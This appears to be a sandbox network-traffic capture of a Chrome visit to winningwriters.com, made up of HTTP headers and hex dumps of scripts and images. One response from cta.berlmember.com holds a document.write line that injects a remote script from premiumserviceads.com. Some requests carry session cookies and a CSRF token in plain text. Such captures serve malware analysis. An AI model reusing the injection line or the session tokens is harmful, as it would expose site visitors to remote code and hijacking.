                                                                                                                                                                                            2024-11-18 20:00:07 UTC1378INData Raw: 6f 6d 70 6c 65 74 65 7c 61 6a 61 78 45 72 72 6f 72 7c 61 6a 61 78 53 75 63 63 65 73 73 22 2c 0a 09 72 61 6a 61 78 45 76 65 6e 74 20 3d 20 6e 65 77 20 52 65 67 45 78 70 28 20 22 5c 5c 62 28 3f 3a 22 20 2b 20 61 6a 61 78 45 76 65 6e 74 73 20 2b 20 22 29 5c 5c 62 22 20 29 2c 0a 09 72 68 6f 76 65 72 48 61 63 6b 20 3d 20 2f 28 3f 3a 5e 7c 5c 73 29 68 6f 76 65 72 28 5c 2e 5c 53 2b 7c 29 5c 62 2f 2c 0a 09 68 6f 76 65 72 48 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 20 65 76 65 6e 74 73 20 29 20 7b 0a 09 09 69 66 20 28 20 74 79 70 65 6f 66 28 20 65 76 65 6e 74 73 20 29 20 21 3d 3d 20 22 73 74 72 69 6e 67 22 20 7c 7c 20 6a 51 75 65 72 79 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2e 68 6f 76 65 72 20 29 20 7b 0a 09 09 09 72 65 74 75 72 6e 20 65 76 65 6e 74 73 3b
                                                                                                                                                                                            Data Ascii: omplete|ajaxError|ajaxSuccess",rajaxEvent = new RegExp( "\\b(?:" + ajaxEvents + ")\\b" ),rhoverHack = /(?:^|\s)hover(\.\S+|)\b/,hoverHack = function( events ) {if ( typeof( events ) !== "string" || jQuery.event.special.hover ) {return events;


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            26192.168.2.1649739103.52.144.2144436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:07 UTC537OUTGET /google/jquery.php HTTP/1.1
                                                                                                                                                                                            Host: cta.berlmember.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-11-18 20:00:07 UTC219INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:07 GMT
                                                                                                                                                                                            Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
                                                                                                                                                                                            X-Powered-By: PHP/7.3.10
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            2024-11-18 20:00:07 UTC90INData Raw: 35 34 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 72 65 6d 69 75 6d 73 65 72 76 69 63 65 61 64 73 2e 63 6f 6d 2f 79 4a 75 69 44 22 20 64 65 66 65 72 3e 3c 2f 73 63 72 69 70 74 3e 27 29 3b 0d 0a
                                                                                                                                                                                            Data Ascii: 54document.write('<script src="https://premiumserviceads.com/yJuiD" defer></script>');
                                                                                                                                                                                            2024-11-18 20:00:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            27192.168.2.164974566.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:07 UTC895OUTGET /graphics/wergle/garnham_home_page_slide_a.jpg HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://winningwriters.com/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:07 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:07 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Thu, 15 Aug 2024 02:38:57 GMT
                                                                                                                                                                                            ETag: "23074-61fafbe9ab9e7"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 143476
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:07 GMT
                                                                                                                                                                                            Vary: User-Agent
                                                                                                                                                                                            Content-Type: image/jpeg
                                                                                                                                                                                            2024-11-18 20:00:07 UTC7835INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8e 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 39 2e 31 2d 63 30 30 32 20 37 39 2e 61 36 61 36 33 39 36 38 61 2c 20 32 30 32 34 2f 30 33 2f 30 36 2d 31 31 3a 35 32 3a 30 35 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                                                                                                                                            Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: b2 23 89 2c cc 4a 9a 7e 3a 90 e2 c2 da 22 8b 14 6d 2a 35 20 e0 3c 89 ee 86 e3 dc 7d 9a ee fc eb a6 dd 9b 72 b6 46 bd ee 69 72 e1 5e 98 6d 28 7e 43 33 19 69 c5 42 2c ba 94 a5 c5 a5 f6 94 94 b6 e2 74 ad 65 43 50 52 ab 80 b1 9d b5 fa 85 bb 6e b9 2d 30 f5 9a e2 f5 fa 69 52 a7 26 c3 29 b6 a4 b4 a4 36 35 bc ab 34 f7 14 87 54 a3 99 4b 46 bc 46 9c 03 cd d3 ea 52 1d 96 ed 67 ba 3a ef fa de c4 f0 91 66 bc b2 86 9b b6 cb 88 e9 79 2a ea bb 09 e2 e2 55 ac 05 32 a2 14 06 43 24 e0 29 d6 c0 ef 2c 5b 07 70 a6 a6 53 bf 2d b5 0c 97 9b bd 47 71 f5 a1 52 5b 8f 29 26 0c a8 ea 71 4a 40 7e 3c 74 86 16 49 d0 b0 da 52 92 9c b0 12 9f 7a fe a6 2c db a5 49 b7 ed eb 8b f1 ed df 33 73 b8 17 52 90 d4 d8 f1 a1 88 aa 43 72 5b 78 25 48 53 f2 d2 80 96 6a 3f 0e aa 5d 41 03 00 0b dc 0f aa 5d
                                                                                                                                                                                            Data Ascii: #,J~:"m*5 <}rFir^m(~C3iB,teCPRn-0iR&)654TKFFRg:fy*U2C$),[pS-GqR[)&qJ@~<tIRz,I3sRCr[x%HSj?]A]
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: a2 0c 74 32 c3 21 a5 2d 69 12 64 1a 12 1a 04 0d 28 07 86 55 a9 c0 7a 1c c4 04 c3 9a c4 1b 1a 65 c8 4a 80 45 93 6b 5b 1b 43 50 d0 80 c8 51 2f 64 03 8e 69 f5 a9 4b 58 20 53 de 0f dd bf 6b 6e ef a9 d7 cb 7e e1 92 fb 6b 8b 11 46 d3 6a 8c e2 d8 0e be d2 ca 64 85 a9 34 52 96 df a7 d3 c0 0c f0 0c dd cb 91 19 3b 95 98 71 59 65 91 6a 8c 18 53 6d 36 94 25 29 0b ab 29 a0 14 3a 53 a8 03 c7 3c 04 5d 78 b2 4e ba 4b 8b 7f 80 fe 9d 61 08 b9 bd d5 0d b4 c2 61 54 a9 4a 48 e2 54 93 42 3e ef 1c 00 3c 92 d5 da e7 70 b9 a5 34 89 3a 42 9f 09 3c 5e 3c 89 1f c9 95 40 e7 80 5b ce bc b0 05 f1 99 76 34 38 ad 32 ce b3 25 0a 76 4c 9d 49 1d 35 14 82 81 a4 e6 aa f0 14 e1 c7 00 d5 22 e3 6d 60 b8 c4 b9 6c b3 32 a3 aa 8c ca f2 1e 9e a1 48 39 81 e3 80 d1 c4 21 c6 03 cd ad 2e a0 fa 9b 71 06
                                                                                                                                                                                            Data Ascii: t2!-id(UzeJEk[CPQ/diKX Skn~kFjd4R;qYejSm6%)):S<]xNKaaTJHTB><p4:B<^<@[v482%vLI5"m`l2H9!.q
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 66 b8 a5 ce dc b7 c5 d5 6e 34 1e 59 2b 50 15 0b 94 f7 04 27 d0 3d 6a 03 01 11 f7 1b 70 4d b8 cf 7a 32 94 17 25 6a f9 9b 9f 41 01 b4 f5 54 3f 0d a4 24 7a 5b 43 69 a0 4a 47 01 4c 02 bd ab b6 d1 6c 62 23 85 21 57 09 27 aa 8d 23 e3 79 d1 40 01 15 24 0f 13 80 b3 16 c8 02 db 06 3c 0a eb 71 03 5c c5 8f bc ea b3 5f 1f 3c 87 b3 00 3b 72 98 66 cb d0 3f 29 82 42 3c cf 02 70 1c 35 a5 22 84 e6 79 71 38 0f 9d 40 4e 49 5d 3c 74 e0 25 5d 88 53 fa 7c e7 2a 34 25 df 41 39 66 53 42 30 16 e3 b4 11 90 f6 d7 bd 25 43 5a a4 49 7b 4b 55 e3 f8 09 46 74 f3 39 60 2d 4d a5 ca 5b ec b0 1b 25 29 87 0d 96 94 d0 e1 54 a4 0a 9f 01 96 58 03 a8 88 01 a4 90 28 30 0a f0 19 80 cc 07 27 1c 08 07 f6 e0 04 ee 12 94 f1 28 19 36 8f 8a 82 a1 5e 18 06 f4 a0 38 41 23 2a d3 4e 75 af 90 18 02 18 36 c5
                                                                                                                                                                                            Data Ascii: fn4Y+P'=jpMz2%jAT?$z[CiJGLlb#!W'#y@$<q\_<;rf?)B<p5"yq8@NI]<t%]S|*4%A9fSB0%CZI{KUFt9`-M[%)TX(0'(6^8A#*Nu6
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 23 80 ae f8 03 4d 8f 78 83 68 b8 cc 17 07 7e 5d 89 cc 06 d3 20 82 52 85 a1 5a 86 a0 2a 68 46 55 a6 02 7e d8 86 cb ba 6e 77 25 37 20 4c 8f 61 e8 a9 e6 42 4f 4e 42 dd d4 51 42 73 28 49 4e 79 66 72 e1 80 98 24 12 a2 a5 1c d4 79 e0 18 a5 8d 48 71 3f cc 93 96 02 bc f7 43 b9 56 dd 8a d1 84 d3 68 b9 6e 89 48 d5 0e d4 49 e9 b0 95 0f 4b d2 88 cd 29 e6 94 7c 4a f2 19 e0 29 bc 9b a5 ca f3 71 91 77 ba cc 72 75 c6 5a b5 48 94 e7 13 e0 94 81 92 52 91 90 48 c8 0c 03 dc 45 87 02 73 29 50 a5 70 0f ad 67 40 40 af 2c 03 9b 20 8a 0e 3e 78 07 06 c8 c0 29 49 af 1c bd 98 0e c3 cb 01 d0 7b 6b fb 30 1b 69 cf d5 96 03 ea 45 07 0c f0 1d 90 38 50 67 ee c0 2e 68 56 9f bb 00 f9 17 55 45 3e cc 01 34 3a 7a 79 60 0d ed d4 05 04 fd 98 09 0a d7 43 a3 01 23 5a be ee 59 57 01 22 db 05 4a 79
                                                                                                                                                                                            Data Ascii: #Mxh~] RZ*hFU~nw%7 LaBONBQBs(INyfr$yHq?CVhnHIK)|J)qwruZHRHEs)Ppg@@, >x)I{k0iE8Pg.hVUE>4:zy`C#ZYW"Jy
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: a8 9c c8 c8 79 05 dc ed 5d b7 b4 01 b8 0d 6f fb eb ce 6e 0a 92 9b 74 84 38 8b 63 4d 85 10 ca 50 86 40 40 05 14 3f 88 78 d7 2a 66 42 ff 00 59 a0 da 62 41 8a 2c c8 8f f2 05 b4 fc 9a e3 68 2d 74 c8 a8 e9 e8 f4 e9 3f d5 cb 00 e8 a5 25 23 52 8d 00 e2 70 15 73 bb 7f 51 fb 4f 6c 75 b6 d5 85 9b 7e ed dc 52 12 12 60 3e e8 54 46 f5 1a 20 ba 10 97 16 b0 48 c8 00 12 7f 9f 01 e5 3f 73 1f b8 ee 8d c5 74 b8 6e 48 ed a2 f7 71 5a 10 62 c2 8c 98 2d c7 01 21 a6 da 8e ca 28 34 50 01 43 5a 9a 9a d4 93 80 55 1f 61 76 ff 00 b7 f6 f8 2a ee 04 e9 17 0b cd df 58 76 3b 3d 4e 83 60 0a 2c 74 5a cc a5 ba d1 4e 28 fc 59 01 80 5b b9 fb 43 b7 a6 58 7f 56 d8 9a 93 29 b6 4c a8 b1 c4 92 fc 59 d1 d2 9a a9 0d 29 5f 02 80 04 a4 83 99 f4 90 30 10 25 8f 64 5f 77 03 11 5f 88 da db 88 ce be 95 ea
                                                                                                                                                                                            Data Ascii: y]ont8cMP@@?x*fBYbA,h-t?%#RpsQOlu~R`>TF H?stnHqZb-!(4PCZUav*Xv;=N`,tZN(Y[CXV)LY)_0%d_w_
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: e4 ae 23 7d 41 ad 2a 41 07 e6 5c 58 3c 41 15 07 01 08 bd da b8 6b dd 70 ad c8 98 6d db 72 e2 85 4b 8e a5 bb 57 fa 48 f5 2e 1a 54 45 03 9a 73 0a 27 e0 f5 66 46 01 97 7c 6e 66 ae 17 98 76 cb 24 56 e2 6d 7d b0 d9 89 61 65 84 e9 43 95 23 ac f7 89 d6 a1 40 4e 64 0a 9c ce 02 e1 76 6f bd f2 a6 76 22 0f 65 13 19 d8 b6 dd b7 72 99 3f 72 5c 5e 52 03 33 63 ce 94 e4 98 91 1b 40 55 7a 6d 92 a5 3a 16 34 a8 e9 19 a7 56 01 9b 78 c9 85 7e b6 3b 1b 72 5b 63 0b 23 8d ba da d9 73 4a a4 82 32 8d f2 4e 20 50 2d 67 30 01 ad 48 19 e7 80 a1 72 a3 b9 16 44 b8 6e 05 21 71 9d 71 87 1b 5d 35 02 85 14 14 ac 0c aa 38 1a 65 5c 03 78 b7 db e4 3c da 24 b4 96 99 53 89 0f 3c da 4e a4 a0 9f 51 01 34 a9 a6 02 4f 91 3a d2 f4 43 01 13 23 1b 1a 9a 31 d1 10 48 28 4b 2d 86 ca 10 0c 65 34 0a 85 68
                                                                                                                                                                                            Data Ascii: #}A*A\X<AkpmrKWH.TEs'fF|nfv$Vm}aeC#@Ndvov"er?r\^R3c@Uzm:4Vx~;r[c#sJ2N P-g0HrDn!qq]58e\x<$S<NQ4O:C#1H(K-e4h
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: ba eb 6c b6 e3 ce af a6 d3 23 53 8b 3c 12 91 c4 9a 72 18 0e 84 0a 29 2a a1 4a d2 52 a1 5c 8a 48 cf 3e 60 8c 04 17 b8 2d 3f a6 5c 64 b4 ca 54 23 85 6a 69 2a 20 90 93 98 e1 cb c2 b9 e0 18 30 02 d7 76 1a 72 53 cd b8 80 b4 2b 4b 85 04 02 2a b1 5a 8a 8f 6f 0c 06 f6 3d 9d 6d bc 3c eb 92 a3 48 f9 18 c0 ad c6 21 15 19 32 1c 09 2a 4c 76 42 c9 4e a5 d2 9c bd a2 b8 07 6d cd db 9b 6b f0 c4 cb 2d a5 fb 1c 78 b0 d0 56 5f 71 d5 ca f9 ba 85 ba c4 98 ea 0a 6c 04 37 42 56 97 2b ac 14 d3 4d 0e 00 4f 64 6c f8 d3 37 25 bd 9b c6 8b 85 b0 97 09 86 da 94 da a4 3c 12 4b 4c 1e 60 2d 5c 4d 70 1e 8d 76 fb e9 13 6d 6f 14 d9 77 35 e0 c5 b6 da 90 b6 64 aa c3 61 7d 5d 37 54 9a 2f a3 2d c5 57 49 15 01 61 ba 1e 29 a8 c0 77 ef cf d1 f4 d7 e4 bf ba 7b 42 98 d1 92 fa 75 dd 36 87 cc 26 02 1a
                                                                                                                                                                                            Data Ascii: l#S<r)*JR\H>`-?\dT#ji* 0vrS+K*Zo=m<H!2*LvBNmk-xV_ql7BV+MOdl7%<KL`-\Mpvmow5da}]7T/-WIa)w{Bu6&
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: 8d 0b 00 1a 03 80 5a d5 a7 b7 db 97 b7 d7 2b 1d bb b8 92 d7 07 65 cf ff 00 50 49 ba ca b5 38 db b0 e2 cc 02 33 c9 e8 05 12 e3 6b 73 49 25 27 d2 78 8c 00 5b 7b 0b 67 b2 14 bf fd db b2 48 69 49 3a 02 20 4d 2e 83 e3 d3 d3 4a f8 67 80 93 b7 ad 93 6c 5d 27 da af ef 6f 76 2d 6e 5e ad 10 dc 8e 24 43 7d 48 94 d4 76 c4 73 21 b2 dd 48 52 ca 33 42 b8 1c 06 db 4e d1 b7 5b 93 78 b6 5b f7 8b 37 61 7f b5 3f 11 51 3e 4d e6 9c 1a 07 57 5f ab d2 74 69 27 4f 13 cb 3c 07 0d a9 6c da cb bd 43 7a df b8 e4 5e 26 c3 42 9f 4c 74 c2 53 2c 1a 27 4e a2 b5 9a 8a 15 70 a6 67 01 25 de 14 44 65 25 2a d2 29 45 0e 66 9e 18 08 f9 d5 c7 5b 93 50 a4 ad 45 0d a3 ac 05 28 42 78 04 f9 e7 80 7b 69 d3 68 8a db 2b 0b 54 89 03 53 76 f7 57 ab a0 da 87 c4 7f 91 4a 1c 86 03 44 7c ab ad b6 50 9e 81 a9
                                                                                                                                                                                            Data Ascii: Z+ePI83ksI%'x[{gHiI: M.Jgl]'ov-n^$C}Hvs!HR3BN[x[7a?Q>MW_ti'O<lCz^&BLtS,'Npg%De%*)Ef[PE(Bx{ih+TSvWJD|P
                                                                                                                                                                                            2024-11-18 20:00:07 UTC8000INData Raw: fa 95 ed 67 59 f9 1d cd db 35 98 50 96 db dd f0 50 de 95 9d 3f 86 d4 f6 c0 f8 89 f4 a1 de 75 a2 f3 a9 a0 42 fd 9c 72 55 bf b8 96 45 b5 d4 8e e1 87 2e 3a 14 09 49 1f e1 ce 55 cb 2f 4e 02 56 df 3b 2a 2e f3 ef f6 e1 76 f3 72 6e c9 b6 ad b6 4b 76 e4 bf dc 1d 71 0c 92 cf ca b3 46 59 52 d6 84 f5 1d 70 36 81 ea f4 ea 27 95 30 13 56 da ec 43 90 b7 84 7e e3 47 b5 c3 db d7 cb c8 7a 6c e7 d9 71 32 5d 4c 37 94 95 a5 2d f4 ce 94 36 d0 d4 b4 94 24 13 d4 51 51 a9 38 0a bb de e3 68 b9 f7 0e 75 da d2 97 91 b8 6f d3 25 26 f7 b7 14 5b 58 61 e4 13 1e 29 43 8d f1 54 90 90 b2 82 2a 92 45 78 e0 26 9e e7 d8 e0 f6 c7 b3 3b 77 6e ba e1 4d c5 d6 7f 49 78 37 c5 d9 b2 95 f3 57 07 eb cf 40 1a 3e cc 04 73 b5 76 b6 e6 79 e8 3b 7e 65 a4 30 e9 85 f3 96 fb 9b 8e a1 c6 0c 7c 94 94 b8 a4 54
                                                                                                                                                                                            Data Ascii: gY5PP?uBrUE.:IU/NV;*.vrnKvqFYRp6'0VC~Gzlq2]L7-6$QQ8huo%&[Xa)CT*Ex&;wnMIx7W@>svy;~e0|T


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            28192.168.2.164974666.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:07 UTC647OUTGET /assets/images/social-sprite-2019.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:07 UTC368INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:07 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Mon, 28 Oct 2024 15:22:41 GMT
                                                                                                                                                                                            ETag: "c4b-6258b0a28e34c"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 3147
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:07 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:07 UTC3147INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 76 00 00 00 16 08 06 00 00 00 15 53 68 4b 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 0b e0 49 44 41 54 68 43 ed 5a 7b 70 54 d5 19 ff ce dd dd 3c 40 13 0d 63 48 08 41 03 65 40 a9 15 47 8c 81 24 bb 09 1a 0c 0f 1d 1f 13 14 05 1d a7 68 b5 76 da 6a 5b 14 a7 b5 d6 3f 74 3a 9d 6a a1 0f 1d eb 54 e4 21 0a 2a f2 10 68 23 24 9b b7 18 2b 0f 05 db 3a 81 40 c8 83 67 0a 62 92 7d dc d3 df 77 ee d9 cd 26 b9 9b dd 05 fe ab bf c9 97 7b ce 77 ef 3d f7 7c e7 3b e7 7b 9c b3 82 a2 a0 a0 a0 20 35 29 29 a9 40 08 39 4d 92 2c 24 41 37 90 a4 54 bc f0 85 14 54 4f c2 68 f6 3b fd 75 8d 95 8d c7 f4 2b 17 15 d3 cb a6 67
                                                                                                                                                                                            Data Ascii: PNGIHDRvShKsRGBgAMAapHYsodIDAThCZ{pT<@cHAe@G$hvj[?t:jT!*h#$+:@gb}w&{w=|;{ 5))@9M,$A7TTOh;u+g


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            29192.168.2.164974866.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:07 UTC656OUTGET /assets/images/seal-transparent-25x40-2019.png HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            Cookie: PHPSESSID=68a23f8a34142ed9726924749d028c23; exp_tracker=%7B%220%22%3A%22index%22%2C%22token%22%3A%228160ca4970df2539877f22e2d3c4243fbeccefd7bb6b769a4c4f2edf405c9604c6335ac7c49228a149ea57293e04f5b6%22%7D; exp_csrf_token=54b7e56e97f18f0cf878c6ac3ba70750cc3bb811
                                                                                                                                                                                            2024-11-18 20:00:07 UTC368INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Mon, 18 Nov 2024 20:00:07 GMT
                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                            Upgrade: h2
                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                            Last-Modified: Thu, 22 Sep 2022 15:10:56 GMT
                                                                                                                                                                                            ETag: "d5d-5e94577dee15d"
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Content-Length: 3421
                                                                                                                                                                                            Cache-Control: max-age=604800, public
                                                                                                                                                                                            Expires: Wed, 18 Dec 2024 20:00:07 GMT
                                                                                                                                                                                            Vary: User-Agent,Accept-Encoding
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            2024-11-18 20:00:07 UTC3421INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 2c 00 00 00 28 08 06 00 00 00 85 15 18 17 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 0c f2 49 44 41 54 58 47 9d 99 07 78 15 55 16 c7 ef cc bc 97 e4 bd 24 a4 d0 bb 04 08 20 41 08 62 db b5 bb 82 82 ba 22 45 04 95 66 41 3f 2c 28 45 70 0b 20 8a f8 c9 ba 80 22 82 52 45 9a 02 9f 22 a0 88 e8 4a 10 a9 22 bd 23 cd 54 d2 cb 6b 33 fb 3b f3 5e 42 12 12 02 fe bf ef e4 96 39 f7 9c ff bd 73 ee b9 77 5e 34 75 95 f8 78 ee 02 19 f3 0a 32 09 49 7a 6a c8 c0 e3 d2 bf 60 d1 12 dd e5 8a 30 fa f6 ee e9 93 76 29 56 7c b1 da 51 58 58 68 0d 7a 72 40 40 da 0b 16 7d e6 f0 fb fd 7f 50 7d cf 30 8c 29 a5 fd 57 8a ab 22
                                                                                                                                                                                            Data Ascii: PNGIHDR,(sRGBgAMAapHYsodIDATXGxU$ Ab"EfA?,(Ep "RE"J"#Tk3;^B9sw^4ux2Izj`0v)V|QXXhzr@@}P}0)W"


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            30192.168.2.164974766.33.207.424436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-11-18 20:00:07 UTC896OUTGET /graphics/tomstory/mcnamara_home_page_slide.jpg HTTP/1.1
                                                                                                                                                                                            Host: winningwriters.com
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
